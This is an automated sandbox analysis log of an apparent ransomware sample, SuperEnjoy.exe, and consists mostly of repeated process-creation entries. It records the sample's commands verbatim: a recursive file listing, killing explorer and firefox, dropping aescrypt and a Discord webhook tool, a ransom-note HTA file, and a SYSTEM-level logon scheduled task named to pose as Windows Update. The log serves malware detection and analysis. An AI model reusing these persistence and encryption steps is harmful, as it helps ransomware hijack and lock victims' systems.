Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' dir * /a-D /s /b 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /I /V /C:'^$'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: SuperEnjoy.exeStatic file information: File size 1051648 > 1048576
Source: Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: SuperEnjoy.exe, 00000001.00000002.669844747.00000000025E0000.00000004.00000001.sdmp, SuperEnjoy.exe, 0000000E.00000002.668825687.0000000001000000.00000004.00000001.sdmp, aescrypt.exe.14.dr
Source: Binary string: C:\Users\paulej\Documents\Source\AESCrypt\Windows\Console\Win32\Release\aescrypt.pdb source: SuperEnjoy.exe, 00000001.00000002.669844747.00000000025E0000.00000004.00000001.sdmp, SuperEnjoy.exe, 0000000E.00000002.668825687.0000000001000000.00000004.00000001.sdmp, aescrypt.exe.14.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\Desktop\SuperEnjoy.exeUnpacked PE file: 1.2.SuperEnjoy.exe.400000.0.unpack
Source: C:\Users\user\Desktop\SuperEnjoy.exeUnpacked PE file: 14.2.SuperEnjoy.exe.400000.0.unpack
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir * /a-D /s /b | findstr /I /V /C:'^$'
Source: unknownProcess created: C:\Windows\System32\findstr.exe findstr /I /V /C:'^$'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir * /a-D /s /b | findstr /I /V /C:'^$'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /I /V /C:'^$'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /I /V /C:'^$'
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_0040A6F6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,1_2_0040A6F6
Source: DiscordSendWebhook.exe.1.drStatic PE information: real checksum: 0x10070f should be: 0xfcbdf
Source: DiscordSendWebhook.exe.14.drStatic PE information: real checksum: 0x10070f should be: 0xfcbdf
Source: SuperEnjoy.exeStatic PE information: real checksum: 0x0 should be: 0x10a6c7
Source: SuperEnjoy.exeStatic PE information: section name: .code
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00398B85 push ecx; ret 5_2_00398B98
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A68B85 push ecx; ret 18_2_00A68B98

Persistence and Installation Behavior:

barindex
Creates files in the system32 config directoryShow sources
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\System32\config\systemprofile\cryptormsg.hta
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile created: C:\Windows\Temp\1810.tmp\aescrypt.exeJump to dropped file
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile created: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeJump to dropped file
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\aescrypt.exeJump to dropped file
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeJump to dropped file
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile created: C:\Windows\Temp\1810.tmp\aescrypt.exeJump to dropped file
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile created: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeJump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'
